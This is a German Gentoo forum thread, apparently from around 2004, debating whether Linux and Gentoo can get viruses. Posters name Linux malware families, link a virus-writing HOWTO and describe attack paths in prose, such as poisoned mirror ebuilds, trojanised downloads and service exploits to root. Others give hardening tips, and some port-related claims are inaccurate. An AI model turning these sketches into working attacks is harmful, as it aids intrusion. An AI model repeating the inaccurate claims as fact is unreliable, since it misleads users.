# Gibt es unter Linux (Spez. unter Gentoo) Viren?

## norc

jemand meint es müsse unter linux viren geben, jez brauch ich nur noch jemanden der das widerlegt.. ich selber weiss es mit absoluter sicherheit, dass es nicht geht...

aber was soll man tun wenn man einen winxpuser vor sich hat;))

norc

----------

## norc

winxp  (korrektur)

norc

----------

## SnorreDev

Es gibt Viren unter Linux, allerdings sind sie halt nicht wirklich verbreitet, und wer nicht Mandrake oder so im Std::Root Mode ausfuehrt, braucht sich auch weniger sorgen zu machen wuerde ich mal sagen. 

Ausserdem fuehrt man auch nicht jeden Mist aus, den man im Net findet  :Very Happy: 

----------

## norc

meinst du?? kannst du mir homepages nennen auf denen infos über diese viren sind??

ach und bei gentoo kannst du keinen kriegen, da wenn ich emerge, dass dann 

sämtliche überprüfungen von größen der pakete bis sonstwasweißich dürchgeführt werden.

 und versuch erstmal die gentooserver, auf denen bestimmt auch gentoo läuft einmal zu hacken... 

wenn du das schaffst kriegst du einen lolli;))

----------

## beejay

Viren sind immer nur so gut, wie der Anwender blöde ist. Wer als root arbeitet -> Vollidiot, wer als root unbedarft alles anpackt und ausführt -> Vollidiot.

----------

## norc

meine meineung;))

norc

----------

## ruth

hi,

um mal mit diesem vorurteil ein für allemal aufzuräumen:

 JA  es gibt viren für Linux / *NIX.

links dazu werde ich nicht posten - ob das dann den forenregeln entsprechen würde,

das wage ich zu bezweifeln...

aber glaub mir: es ist definitv möglich eine ELF datei mit zusätzlichen (bösartigem) code zu

infizieren...

damit hast du einen virus.

und dass es trojaner / exploits / shellbinding backdoors, locale backdoors gibt.

das steht wohl ausser frage.

also:

kümmert euch bitte um eure server / apacheconfigs / ftp server configs ...

es gibt auch im linuxland genügend sicherheitsschwachstellen...

ein beispiel:

ein bekannter hatte sich einen neuen rootserver bestellt. (SuSE 8.1)

leider kam die bestätigungsemail nicht an.

nach 3 (!!) tagen das erste mal draufgewesen.

zu diesem zeitpunkt war der server schon hochgradigst verseucht....

also:

lasst bitte diesen  linux ist sicher  schwachsinn.

das ist ein ammenmärchen. (PUNKT)

es gibt sogar leute die sagen, dass gentoo besonders unsicher (!!) wäre,

da es über wget / ftp / gcc verfügt und damit, naja, angreifern es sehr leicht gemacht wird.

(im gegensatz zu etwa debian, wo man nicht unbedingt einen gcc haben muss)

als anehmbares workaround kann man z.b. /usr/[machtype] auf 0700 setzen.

das sollte annehmbar sein.

desweiteren unbedingt /tmp als noexec,nosuid,nodev,noatime mounten.

das sollte zumindest 90 % aller kiddies stoppen...   :Wink: 

desweiteren eine software wie aide sollte pflicht sein;

btw: aide.conf / aide.db lokal per sftp auf den heimrechener transferieren.

auch die aide binary selbst per md5sum kontrollieren, bitte.

ausserdem sollte man syslog auf einen logserver loggen lassen.

ach ja: damit der angreifer davon nix mitkriegt -> die sysklogd binary bitte

vor dem kompilieren auf eine andere config auslagern (z.b. /usr/.sys/.conf/blah.conf )

die reguläre config in /etc bleibt natürlich.

die soll ja nur den angreifer verwirren; in dieser steht natürlich nicht von einem logserver...

ach ja: wenn du auf der Gentoo kiste auch noch PHP-Nuke laufen hast,

tja dann hast du eigentlich schon verloren... eine backdoor ist dir sicher !!!

naja, tut mir leid, falls ich dich jetzt disillusioniert haben sollte...  :Wink: 

gruss

rootshell  :Cool: 

----------

## py-ro

...toll rootshell...jetzt hast alles woran ich geglaubt habe erachüttert...

Nein im Ernst,

Viren (alles andere lass ich mal weg) werden sich in Zukunft wesentlich mehr auf U***X und Linux Systeme ausbreiten als bisher, einfach weil es sich weiter verbreitet und deshalb interressanter wird.

MfG

----------

## Sas

 *norc wrote:*   

> [...]
> 
>  und versuch erstmal die gentooserver, auf denen bestimmt auch gentoo läuft einmal zu hacken... 
> 
> wenn du das schaffst kriegst du einen lolli;))

 

http://www.heise.de/security/result.xhtml?url=/security/news/meldung/42608&words=Gentoo

Lolli bitte!

Nein ernsthaft, grundsätzlich ist natürlich ersteinmal jedes System angreifbar, warum sollte Gentoo da die Ausnahme sein?

----------

## SnorreDev

Jetzt wisst ihr, wozu emerge -uDv world gut ist ^^

Und hoffen, dass der neueste security patch schon drin ist

----------

## ruth

hi nochmal,

weil wir gerade bei security sind...

es gibt seit dem 20.4(?) eine neue bekannte sicherheitslücke im linux kern;

namentlich in der funktion ip_setsockopt().

betrifft versionen 2.4.22 - 2.4.25, 2.6.1 - 2.6.3

erste poc exploits sind unterwegs...

effekt:

lokale eskalation zu uid=0 (!!)

wundert mich, dass es dazu noch kein GLSA gibt...

aber schlieslich ist ja 2.4.26 bzw. 2.6.6.rc1 schon stable markiert. liegts daran ???

ansonsten wäre es jetzt ein guter zeitpunkt den kernel upzudaten...

-->> tschüss uptime

gruss

rootshell

----------

## Carlo

@Sas: Ich meine mich zu erinnern, daß die rsync-Server Rothüte waren. Das hindert Dich natürlich nicht daran, anderswo Lollis zu sammerln.

----------

## Carlo

 *rootshell wrote:*   

> wundert mich, dass es dazu noch kein GLSA gibt...

 

 :Arrow:  Bug 47881

Guck' Dir an, wie lange es gedauert hat, Bug 41800 zu fixen. GLSA ist zur Stunde immer noch nicht raus. Abgesehen davon, daß das kein Einzelfall ist, ist es Politik des Gentoo Security Teams, erst zu benachrichtigen, wenn das Problem gefixt und nicht auch schon, wenn es bekannt ist. Wirklich gut ist das nicht - einen sensiblen Server würde ich angesichts der Informationspolitik und der benötigten Zeitspanne eher unter Debian oder *BSD laufen lassen.

----------

## Lenz

Trotzdem werden die Viren in der Art wie man sie von Windows her kennt unter Linux/*nix keine große Rolle spielen.

Das fängt schon mit der Programmvielfalt an. Es benutzen nicht alle die gleiche Kernelversion, das gleiche E-Mailprogramm, den gleichen Browser, den gleichen FTP-Server etc. etc... Das macht es schon wesentlich schwieriger für Virenprogrammierer. Zusätzlich ist man nicht ständig als root unterwegs, so wie das aber unter Windows meistens der Fall ist.

Das es keine Viren unter Linux gibt, ist natürlich Unsinn. Aber ich schätze in Zukunft werden er die Ausnutzung von Exploits, Rootkits etc. eine Rolle spielen. Oder beispielsweise Schwachstellen in Netzsoftware wie Apache, Sendmail und solchen geschichten; wogegen Dialer und so unter *nix wenig Chance haben werden, schon allein wegen der Vielfalt der Programme.

Außerdem kennen sind wohl Linuxuser (zumindest zur Zeit noch  :Wink:  ) wesentlich besser mit der Materie aus, als die meisten Windowsuser. Ich hatte auch unter Windows nie ein Virenproblem... indem man  gescheite Software einsetzt und nicht die, die jeder benutzt, kann man sich auch dort schon ziemlich sicher machen.

Ums zu einem Schluss zu bringen: 100%ige Sicherheit gibt's nirgends und wird es auch niemals geben. Und mit 100%iger Sicherheit wäre das Leben doch auch langweilig (meine Meinung).

Lenz.

----------

## McPringle

 *norc wrote:*   

> ich selber weiss es mit absoluter sicherheit, dass es nicht geht...

 

Klar gibt es Viren unter Linux. Ein Virus ist nichts anderes als ein Programm - nur dass es eben etwas tut, was Du nicht möchtest. Einige auch unter Linux lauffähige Viren sind beispielsweise:

W32.Peelf.2132

Linux.Cheese.Worm

Linux.Jac.8759

Linux.Lion.Worm

Linux.Millen.Worm

Linux.Adore.Worm

Trojan.Linux.Zab

Trojan.Linux.Typot

Linux.Slapper.D

Linux.Slapper.Worm

Linux.Hijacker.Worm

Trojan.Linux.JBellz

Linux.Simile

Das ist nur eine kleine Auswahl - es gibt noch einige mehr.

Gruß

McPringle

----------

## norc

warum steht das sann überall... ich selber hab das gesagt, weil ich as schon mehrmals in foren gelesen habe

aber sorichtig bin ich nicht überzeugt.. vielleicht kannst du, McPringle, oder jemand anders, erklären wie ich solche viren bekommen kann (unter gentoo)

und wie die funktionieren.. ich meine mit quellcode..

[/code][/b]

----------

## McPringle

 *norc wrote:*   

> aber sorichtig bin ich nicht überzeugt.. vielleicht kannst du, McPringle, oder jemand anders, erklären wie ich solche viren bekommen kann (unter gentoo)und wie die funktionieren.. ich meine mit quellcode.

 

Wenn Du nicht überzeugt bist, ist das Dein Problem. Du kannst Informationen über Linux-Viren bei sämtlichen Anti-Virus-Software-Herstellern recherchieren oder einfach mal Google bemühen. Quellcode werde ich Dir sicherlich nicht geben. Schau beispielsweise mal bei Symantec oder McAfee vorbei und suche dort nach Linux-Viren. Ein kurzer Abstecher von weniger als einer Minute zu McAfee und ich hatte eine Liste von 65 Linux-Viren. Das kannst Du prüfen und dann entscheiden, ob Du McAfee traust.

Viren verbreiten sich unter Linux genau so wie unter Windows. Man kann sie per Mail erhalten, über P2P-Tauschbörsen, über Sicherheitslöcher etc. Da gibt es erstmal keinen Unterschied zwischen Windows und Linux.

Du musst einen Virus nicht wie einen Virus betrachten, sondern wie ein Programm - denn ein Virus ist nichts anderes als ein Programm. Ob das Programm ein nützliches Tool ist, dass auf Deinem System nach Dateien sucht (z.B. find) oder etwas schädliches anrichtet, wie beispielsweise Dateien löschen, ist egal.

Daher gibt es schon mal per Definition kein System, für das Viren unmöglich sind. Jedes System, für das Programme geschrieben werden können, für das können auch Viren (wie gesagt sind Viren schliesslich auch nur Programme) geschrieben werden. Und sich auf irgendwelche Aussagen in irgendwelchen Foren zu verlassen und das dort gesagte nachzuplappern ist naiv/blauäugig.

Gruß

McPringle

----------

## norc

hmm, okay.. sorry ich nehma alles zurück.. 

google gibt doch ne menge an ergebnissen (869)

also ich will ja nichts gesagt haben, 

aber dem linux-freak (was ich jez weniger glaube) glaub ich jez nicht mehr... schönen dank euch allen..

----------

## Ragin

Der Vorteil an Linux ist schlichtweg nur, dass man nicht einfach so an Administrationsrechte rankommt, wenn man als normaler Nutzer arbeitet.

Windows da aufzubohren ist in der Regel das kleinste Problem, zumal die meisten nichtmal ein Admin Kennwort vergeben haben.

Auf der anderen Seite gibts auch LinSpire (ja, neuer Name...), welches komplett unter root läuft (was auch immer noch der Fall ist, soweit ich weiss).

Im Prinzip wäre das die Komplettverarschungder Masse, die meint sich ne einfache Linuxkiste hinzustellen und damit sicherer als unter Windows zu sein.

Einen Exploid kann man bereits in ein kleines Shell Script einbauen und darüber Root-Rechte erlangen. Alternativ gibt es Exploids, die z.Bsp. mySQL angreifen und die Daten von außen so ändern, dass man Zugriff auf die DBs und ggf. auf das System bekommen kann. Diese Löcher wurden zwar schon geschlossen, jedoch sollte dir das mal zu denken geben, dass man auch dein Linux von außen knacken kann, ohne dich darum bemühen zu müssen (durch Mails/P2P oder irgendwelchen Dateien).

In meiner Ausbildung zum Netzwerktechniker hatten wir Unix als Fach. Nach einer halben Stunde hatte die Lehrerin keine Root-Rechte mehr auf dem Server...und das mitten im Vortrag wie sicher Unix sei. Dabei hatten wir zu dem Zeitpunkt gerade mal 2 Wochen vorher begonnen uns nebenher mit Linux zu befassen.

Wenn man einmal Root-Rechte besitzt kann man auch alles auf dem System machen. Das heisst danach kann man Viren/Trojaner/Würmer/Keylogger... installieren, und sich an dem Rechner bedienen bis zum Umfallen.

Ich denke mal diese Beispiele sollten reichen um klar zu machen, dass Unix/Linux wirklich nicht sicherer ist als andere Systeme, sondern nur bei korrekter Handhabe besser gestählt werden kann und die meisten Angriffe dadurch abwehren kann.

----------

## mikkk

Fall jemand noch ein paar gute Infos zum lesen sucht, kann sich ja mal das hier angucken:

http://www.lwfug.org/~abartoli/virus-writing-HOWTO/_html/

Die Seite ist IMHO Skript-Kiddie-sicher und ich denke mal, dass ich das hier posten kann, ohne Schaden anzurichten.

Damit mich nicht doch noch ein voreiliger Moderator erschiesst, hier ein kleiner Auszug:

 *Quote:*   

> 
> 
> Although this document shows a lot of code and technique, it is far from being a "Construction Kit For Dummies". You can't build a working virus just by copying whole lines from this text. Instead I'll try to show how things work. Translation of infecting code to a assembly is left as (non-trivial) exercise to the reader.
> 
> 

 

Bitte nicht hauen   :Rolling Eyes: 

mikkk

----------

## SnorreDev

Jedes System ist anfaellig gegen Schaedlinge - aber letztendlich liegts doch am Admin.

Selbst Win ist einigermassen sicher, wenn man als User arbeitet, eine Firewall am laufen hat, und nicht jeden Mist oeffnet, der in Mails steht, bzw. Outlook benutzt  :Wink: 

----------

## norc

ich möchte euch jez nicht direckt widersprechen, aber um Gentoo mit viren zu infizieren muss man doch erstmal einen virus in den Portage "reinbringen", und mach das erstmal.

Natürlich hab ich keine e-mail-adresse auf der man viren"infizierte" mails bekommt(aber hauptsächlich wegen spam) ...

also geht das mit viren unter gentoo nicht so einfach... oder doch nicht??

----------

## Lenz

Wie oft willst du's eignetlich noch hören?

1. Durch Portage ist es ziemlich unwahrscheinlich, Viren zu bekommen, da alle Archive mit md5 Dateien überprüft wurden - aber auch die lassen sich fälschen (wenn z.B. ein Portagemirror gehackt wird und jemand ein Archiv mit einem mit bösartigem Code austauscht, dann kann er auch eine neue md5-Summendatei erstellen)

2. Wer sagt denn, dass man alle Software über Portage installiert

3. Auch per eMail könntest du theoretisch einen Virus bekommen. Nur sind derzeitig die meisten solcher Viren für Winows / Outlook geschrieben und funktionieren deshalb unter Linux / Deinem eMailprogramm nicht. Aufgrund der großen Vielfalt an Programmen werden IMHO solche Viren unter Linux nie eine große Rolle spielen. Ich denke eher an Rootkits, Exploitausnutzung etc.

Schlussfolglich ist die Aussage, unter Linux gäbe es keine Viren, schlichtweg falsch. Nur: Die wenigen die es bisher gibt haben keine Verbreitung gefunden. Das könnte sich aber mit der Masse an Usern die vielleicht demnächst kommen ändern. Vor allem wenn dann die meisten z.B. SuSE mit der Vorauswahl an Programmen verwenden. Dann ist es einfacher für Virenschreiber.

----------

## McPringle

 *norc wrote:*   

> ich möchte euch jez nicht direckt widersprechen, aber um Gentoo mit viren zu infizieren muss man doch erstmal einen virus in den Portage "reinbringen"

 

Sorry, aber das ist Quark. Mensch Junge, denk doch mal etwas weiter und gründlich über die Sache nach. Das ist doch alles logisch. Welche Wege gibt es auf ein System zuzugreifen?

Eine Mail mit einem Virus als Anhang schicken. Reinschreiben, dass es sich um einen wichtigen Patch handelt. Als Absender die Supportadresse irgend einer Distribution missbrauchen. Je mehr sich Linux verbreitet desto wahrscheinlicher ist es, dass jemand das glaubt und den Anhang ausführt.

Ein Sicherheitsleck nutzen. Es gibt genügend Exploits in etlichen Software-Paketen, die es erlauben, fremden Code einzuschleusen. So, wie es unter Windows Anwender gibt, die keine Patches einspielen, wird es auch unter Linux Anwender geben, die keine Patches einspielen und bei denen die Sicherheitslecks noch bestehen.

Einen öffentlich zugängigen Service nutzen. Beispielsweise FTP mit aktiviertem anonymen Schreibzugriff. Oder HTTP/WebDAV. Oder ein mitgesnifftes FTP-/Telnet-Passwort.

Den Virus als Trojander zum Download anbieten. Ein nützliches Tool schreiben oder einfach von einem anderen OSS-Projekt kopieren und mit einem Virus infizieren. Dann auf einer Webseite zum Download anbieten. Wann hast Du zum letzten mal einen Download sicherheitshalber auf Viren geprüft oder den Quellcode vor dem Kompilieren analysiert?

Heft-CDs bzw. DVDs nutzen. Es gab schon etliche mit Viren verseuchte Heft-CDs. Warum sollte das in Zukunft ausgeschlossen sein?

Über P2P-Software verbreiten. Einfach einen P2P-Client installieren und Viren unter beliebten Dateinamen zum Sharing freigeben. Irgend jemand wird es sich schon saugen und starten.

Du siehst, mit ein wenig Nachdenken kommt man zu dem Schluß, dass es unter Linux nicht anders ist als unter Windows. Und nicht nur unter Windows, nein, unter jedem System. Egal, ob Windows, Linux, MacOS, OS/2, BeOS, QNX, Solaris, AIX, *BSD etc. pp.

Nun klar?

Gruß

McPringle

----------

## Carlo

 *Lenz wrote:*   

> 
> 
> 1. Durch Portage ist es ziemlich unwahrscheinlich, Viren zu bekommen, da alle Archive mit md5 Dateien überprüft wurden - aber auch die lassen sich fälschen (wenn z.B. ein Portagemirror gehackt wird und jemand ein Archiv mit einem mit bösartigem Code austauscht, dann kann er auch eine neue md5-Summendatei erstellen)

 

Du kannst sogar Daten nachladen, ohne daß sie per Digest überprüft werden. Die Übernahme eines Mirrors und ein fehlerhaftes Ebuild reichen schon aus, um eine (allerdings ungezielte) Attacke zu fahren.

----------

## norc

Aber ich lese in der Regel keine mails.

Und ich beziehe alle Software über Portage...  :Wink:                                                   Und die Files die ich mit BitTorrent share sind absolut sicher....

Hat denn jemand von euch gehört das das Portage geknackt wurde??

Ich jeden falls noch nicht, denn das mit dem rsync.gentoo.org Rotationsserver sagt mir nicht allzu viel. Und der Aussage 

 *Quote:*   

> Der Angreifer scheint ein rootkit installiert und einige Dateien modifiziert bzw. gelöscht zu haben, um seine Aktivitäten zu verschleiern; sonst scheint das System aber nicht verändert worden zu sein.

 

glaub ich schon...

Trotzdem vielen Dank an alle die sich die Arbeit gemacht haben meine Frage 

zu beantworten... ich bin jez der Ansicht, dass es schon Viren gibt, dass diese aber nur solange ungefährlich sind solange ich nicht nur unter root arbeite(was auch ziemlich blöd wär)

Thx

----------

## sirro

 *norc wrote:*   

> Hat denn jemand von euch gehört das das Portage geknackt wurde??
> 
> Ich jeden falls noch nicht, denn das mit dem rsync.gentoo.org Rotationsserver sagt mir nicht allzu viel.

 

Das kannst du dir einfach überlegen indem du dir vorstellst was bei einem emerge sync vom rsync.xxx.gentoo.org runtergeladen wird: Die ebuilds und die Manifests.

Und das reicht schon auch um SRC_URI (also das wo emerge die Installdatei herholt) und die entsprechenden digests (passenden MD5-Summen) zu ändern.

Wenn also ein rsync mit der Absicht (ungezielten) Schaden anzurichten geknackt wird, dann kann ein System welches seinen Tree mit dem vom Server synchronisiert kompromitiert werden indem das entsprechende Programm installiert/geupdatet wird.

 *norc wrote:*   

> ich bin jez der Ansicht, dass es schon Viren gibt, dass diese aber nur solange ungefährlich sind solange ich nicht nur unter root arbeite(was auch ziemlich blöd wär)

 

Falsche ansicht. Auch ein Programm was nur als User läuft kann passwörter ausspionieren und sonstigen Unfug anstellen.

Die beste Sicherheit bietet immer noch gesundes bis paranoides Misstrauen gegenüber allem Unbekanntem und ein gut konfiguriertes System...

Aber 100%ige Sicherheit beim PC gibt es IMO nur wenn du den Ausschalter betätigst.   :Twisted Evil: 

----------

## norc

Hmm...

vielleicht hats du Recht, aber wenn der rsync keinen direkten Schaden aufgenommen hat, und die sicherheitslücke behoben wird, dann kann durch den portage kein virus mehr zu mir gelangen

also wäre dann noch das filesharing über bittorrent ein winziges und die e-mail, welche ich aber nicht nutze, ein größeres problem....

Also könnte es doch noch dauern bis das portage geknackt wird... außerdem gibt es ja ne menge an servern und die wahrscheinlichkeit einen infizierten zu erwischen dürfte sehr gering sein und ein geknackter server fällt doch sofoft auf und wird isoliert oder etwa nicht??

[/quote]

----------

## McPringle

 *norc wrote:*   

> vielleicht hats du Recht, aber wenn der rsync keinen direkten Schaden aufgenommen hat, und die sicherheitslücke behoben wird, dann kann durch den portage kein virus mehr zu mir gelangen

 

Hmmm - mir scheint Du liest die Beiträge hier nicht richtig durch. Wenn ein Server, z.B. der RSYNC-Server, infiltriert wird und jemand ändert dort ein ebuild so ab, dass von einem anderen Server eine modifizierte/infizierte Quellcodedatei geladen wird und passt in dem ebuild den Hash an, dann bekommt jeder die infizierte Version auf seinen Rechner, die in der Zeit einen RSYNC gemacht hat, während der der Server infiltriert war.

Es ist einfach so, dass jedes System potentiell gefährdet ist. Auch Linux. Auch Gentoo.

Gruß

McPringle

----------

## ruth

hi nochmal,

ich hab mir den thread jetzt nochmal durchgelesen...

@norc:

bist du ein script kiddie???   :Evil or Very Mad: 

 *norc wrote:*   

> 
> 
> ...kannst du mir homepages nennen auf denen infos über diese viren sind??
> 
> 

 

 *norc wrote:*   

> 
> 
> ...erklären wie ich solche viren bekommen kann (unter gentoo)
> 
> und wie die funktionieren.. ich meine mit quellcode.. 
> ...

 

ich hoffe ja nicht, aber ich hab so den eindruck...  :Wink: 

gruss

rootshell

----------

## McPringle

 *norc wrote:*   

> Und ich beziehe alle Software über Portage... 

 

Und was ist mit der Quake-CD, die Du Dir (wie in einem anderen Thread von Dir selbst geschrieben) von einem Freund geliehen hast? Vom Tatbestand der Raubkopiererei mal abgesehen kam die wohl nicht übers Portage...  :Cool: 

McPringle

----------

## Inte

 *rootshell wrote:*   

> @norc: bist du ein script kiddie???

 Und wenn er eins ist?  :Rolling Eyes:  Gibt 's dann hier ein Gemetzel?  :Laughing: 

Außerdem hab ich einen Onkel, dessen Arbeitskolleges Sohn eine Freundin hat, deren Neffe schon mal von jemandem gehört hat, daß da irgendjemand schon mal ein Tool gefunden hat mit dem man angeblich unbekannte Sicherheitslücken ausnutzen kann  :Wink: 

Spaß beiseite. Der gute Norc wird schon bemerkt haben, daß hier über solche Themen sehr vorsichtig diskutiert wird. Gell, Norc?

Gruß, Inte.

----------

## Ragin

1) nutzt du generell keine E-Mails oder warum schließt du das generell aus?

2) Java/ActiveX Komponenten können auch Viren/Trojaner/Exploids... auf deinem Rechner installieren. Das einfach surfen im Internet könnte also schon z.Bsp. einen Virus installieren.

3) jeder offene Port ist eine potentielle Gefahrenquelle -> du hast z.Bsp. mySQL installiert. -> exploid drauf los gelassen -> root Passwort rausgefunden -> per ssh / telnet eingeloggt -> System übernommen -> Viren/Trojaner... drauf

Merk dir eins: KEIN System ist sicher!!!

Es gibt immer Möglichkeiten irgendwo drauf zu kommen, nur dauert es meist länger Schwachstellen zu finden, als die Updateintervalle sind.

Gentoo ist auch nur so sicher wie du damit umgehst und wie du auf potentielle Gefahren gefasst bist.

Der Vorwurf des Script Kiddys würde ich mal aussen vor lassen. Wenn es so wäre würde er zumindest wissen, dass es mehr Möglichkeiten als portage gibt um Gentoo zu knacken  :Smile: 

----------

## Lenz

 *McPringle wrote:*   

> Und was ist mit der Quake-CD, die Du Dir (wie in einem anderen Thread von Dir selbst geschrieben) von einem Freund geliehen hast? Vom Tatbestand der Raubkopiererei mal abgesehen kam die wohl nicht übers Portage... 

 

Ausleihen ist noch lange keine Raubkopiererei... solange es eine Original-CD war.

----------

## McPringle

 *Lenz wrote:*   

> Ausleihen ist noch lange keine Raubkopiererei... solange es eine Original-CD war.

 

Der komplette Thread dazu legt es jedoch sehr nahe, IMHO. Wenn man im Thread unter anderem erzaehlt, dass man die Seriennummer von der CD eines Freundes hat und dann fragt, wie man sie unter Linux mit Quake nutzen kann... Nunja, OT, aber ich wollte es nur mal erwaehnt haben.

Schoenen Feiertag noch

McPringle

----------

## ruth

hi,

wie dem auch sei - meine meinung hab ich mir schon gebildet über den feinen herrn norc... *gg*

ebenfalls noch einen schönen feiertag.  :Wink: 

gruss

rootshell

----------

## hoschi

 *norc wrote:*   

> meinst du?? kannst du mir homepages nennen auf denen infos über diese viren sind??
> 
> ach und bei gentoo kannst du keinen kriegen, da wenn ich emerge, dass dann 
> 
> sämtliche überprüfungen von größen der pakete bis sonstwasweißich dürchgeführt werden.
> ...

 

ob das die jungs von debian auch gesagt haben?

selbstzufriedenheit...kann sehr böse enden

<edit>

aus diesem grund ist die "universal-cd" gar nicht dumm, sollten die gentoo server einen totalen crash erleiden könnte man gentoo immer noch installieren, mit zusatz cds sogar eine kompletten desktop

meine therie ist einfach der gau, ohne die universal-cds könnte ein angriff auf die zentralen gentoo-server erst diese, dann die ganzen mirror usw.-server "übernehmen" und schließlich alle gentoo-system sobald auf diesen updates eingespielt werden...

windows hat diesen gau ja leider erfolgreich vorgeführt, inzwischen kann man mit einem frischen windows-xp nicht mehr ins internet, nach ca. einer minute fährt das system runter etc.

mit den minimal-cds könnte einem so etwas auch passieren, man könnte gentoo dann nicht mal mehr installieren

*schreckenkstheorienverbreit*

----------

## norc

Nun erstmal langsam...

Tut mir leid wenn ich euren Erwartungen nicht entspreche, aber ich bin nicht der Freak in Sachen Scripte u. Programme. Ich fange grad erst mit Kylix und Perl an... Insofern kann ich noch nicht sagen dass man damit gefährliche Sachen anstellen könnte.

McPringle: Quake3 läuft tadellos unter winxp aber bei mir hat das aus einem mir unerklärlichem grund nicht geklappt.. ich spiel jetzt americas-army und das prob hat sich jetzt..

 *Quote:*   

> 1) nutzt du generell keine E-Mails oder warum schließt du das generell aus?
> 
> 2) Java/ActiveX Komponenten können auch Viren/Trojaner/Exploids... auf deinem Rechner installieren. Das einfach surfen im Internet könnte also schon z.Bsp. einen Virus installieren.
> 
> 3) jeder offene Port ist eine potentielle Gefahrenquelle -> du hast z.Bsp. mySQL installiert. -> exploid drauf los gelassen -> root Passwort rausgefunden -> per ssh / telnet eingeloggt -> System übernommen -> Viren/Trojaner... drauf
> ...

 

1. nein ich benutze keine e-mails wegen spam und weil das lame ist mit e-mails(meiner Meinung nach..)

2.  lassen wir erstmal aus..

3. ich habe eben nur wenig "offene Ports"

+

fortsetzung folgt...

----------

## Ragin

 *Quote:*   

> 
> 
> 3. ich habe eben nur wenig "offene Ports"
> 
> +
> ...

 

Eben. Du hast aber offene Ports. Und das kannst du (ob du willst oder nicht) auch nicht verhindern. Denn ansonsten geht dein Linux schlichtweg nicht mehr  :Smile: 

Gut, die meisten Ports sind auch auf 127.0.0.1 gelegt, aber hier und da eröffnen sich doch einige Möglichkeiten.

----------

## norc

Jetzt kommt mein Widerspruch:

Ich führ die Programme gar nicht aus, noch installiere ich sie (die Programme Die viren beinhalten oder sie Beinhalten könnten)

Also könnten sie über einen "offenen" Port "kommen" aber ich werde doch keine Pseudo Dateien, die ich sowie so bemerken müsste da ich jeden up und download überprüfe, und jeder ungewollte auffällt, installieren ausführen...

und erstrecht nicht unter root

----------

## Ragin

 *norc wrote:*   

> Jetzt kommt mein Widerspruch:

 

Leider immer noch nichts kapiert...(tschuldige für die harte Aussage, aber mehr fällt mir nicht ein...

 *Quote:*   

> 
> 
> Ich führ die Programme gar nicht aus, noch installiere ich sie (die Programme Die viren beinhalten oder sie Beinhalten könnten)
> 
> Also könnten sie über einen "offenen" Port "kommen" aber ich werde doch keine Pseudo Dateien, die ich sowie so bemerken müsste da ich jeden up und download überprüfe, und jeder ungewollte auffällt, installieren ausführen...
> ...

 

Keine Angst, die kommen ohne dass du die runterladen/installieren musst.

Ist ein Port offen reagiert er auf Anfragen. Gibt es ein Leck in dem Dienst dahinter kann man das Programm soweit überfüllen, bis es aussteigt. Dann kann man über dieses Programm Befehle mit dessen Berechtigungen (bei einigen Daemons root, was auch für wenige notwendig ist) ausführen und somit an die /etc/shadow bzw. /etc/passwd gelangen. Diese wiederrum kann man knacken. Oder man installiert einfach andere Programme oder erstellt sich selbst einen Nutzer... Möglichkeiten gibt es viele.

Meinst du die meisten Windows Nutzer führen (bei aktuellen Anlass) die Datei avserve2.exe aus, damit sich Worm.Sasser installieren kann???

Nein, das Teil sucht nach offenen Ports, greift diese an und nistet sich selbstständig auf dem System ein. Da braucht der Nutzer den PC nur an haben und mit dem Internet verbunden sein.

Ansonsten gibt es nat. noch den Weg über CDs usw.

----------

## norc

Aber ich überprüfe den gesamten download, JA DEN GESAMNTEN. Und zwar mit einem Perlscript... und da ist nichts mit unbemerkt durch Ports schlüpfen.

Und noch eine Frage, du bist dir sicher das du über Gentoo und Linux redest??

(Bitte nicht hauen  :Wink:  )

----------

## McPringle

 *norc wrote:*   

> und da ist nichts mit unbemerkt durch Ports schlüpfen.

 

Du weisst nicht, was Ports sind, richtig? Informiere Dich doch bitte mal darüber. Und führe testweise folgenden Befehl aus:

```
nmap localhost
```

Wenn Du so langsam nicht einsiehst, dass Du mit Deiner Annahme, Linux im Allgemeinen und Gentoo im Speziellen sind gegen Viren immun, falsch liegst, erweckt es in mir den Eindruck, Du würdest unter Lernresistenz leiden. Darf ich fragen, wie alt/jung Du bist?

McPringle

----------

## Lenz

Dieser Thread mutiert langsam echt zum Spaßthread... wohin soll das noch führen?  :Wink: 

----------

## Ragin

 *norc wrote:*   

> 
> 
> Aber ich überprüfe den gesamten download, JA DEN GESAMNTEN. Und zwar mit einem Perlscript... und da ist nichts mit unbemerkt durch Ports schlüpfen. 
> 
> 

 

Das Script hätte ich gern...

Ein Download heisst nur, dass du über einen bestimmten Port (21 oder 80 als die gebräuchlichsten) Datenpakete anforderst und dir diese zugestellt werden (und dann auch noch in zig Milliarden kleinen Paketen).

Das du Port 139 für normale Downloads benutzt bezweifle ich, trotzdem ist der wahrscheinlich offen wenn du Samba drauf hast. Von RPC, Mail (25 und 110) wollen wir gar nicht reden. Allein der Port 25 ist definitiv offen. Denn den smtp benötigt Linux um einige Fehlermeldungen an das Postfach von root zu schicken, damit dieser handeln kann und mitbekommt, was los ist.

Ist dieser Port auch extern verfügbar und nicht nur auf localhost hast du eine potentielle Schwachstelle. Und die kann kein Perl Script der Welt durchscannen, da die nicht wissen, was da angreift. Der Angriff kann von ganz normal aussehen, als würde dein System z.Bsp. ne Mail schicken, aber es hängt jemand dran, der Zugriff auf dein System will...vor allem (nach) was scannt das Script????

Wenn dir da zu viele "Fremdwörter" drin sind befrage mal google.de, pro-linux.de, gentoo.de nach solchen Dingen. Gerade im Bereich "Port", "Exploid", "Buffer Overflow" solltest du dich belesen. Dann verstehst du vielleicht das es teiweise nicht schwer ist auf ein System zu kommen, wenn es nicht aktuell gehalten wird und Sicherheitslücken mit "das Update öffnet doch wieder neue Lücken..." abgetan werden. 

 *McPringle wrote:*   

> Wenn Du so langsam nicht einsiehst, dass Du mit Deiner Annahme, Linux im Allgemeinen und Gentoo im Speziellen sind gegen Viren immun, falsch liegst, erweckt es in mir den Eindruck, Du würdest unter Lernresistenz leiden. Darf ich fragen, wie alt/jung Du bist?

 

Da muss ich dir vollkommen Recht geben...

----------

## Deever

 *Ragin wrote:*   

> Eben. Du hast aber offene Ports. Und das kannst du (ob du willst oder nicht) auch nicht verhindern. Denn ansonsten geht dein Linux schlichtweg nicht mehr 

 

Wie kommst du darauf? Linux funktioniert sehr wohl ohne offene Ports.

 *Quote:*   

> Gut, die meisten Ports sind auch auf 127.0.0.1 gelegt.

 

Nein, Ports werden nicht gelegt, sondern geöffnet, geschlossen oder mit z.B. iptables kaputtgemacht.

Gruß,

/dev

----------

## ruth

hi,

 *norc wrote:*   

> 
> 
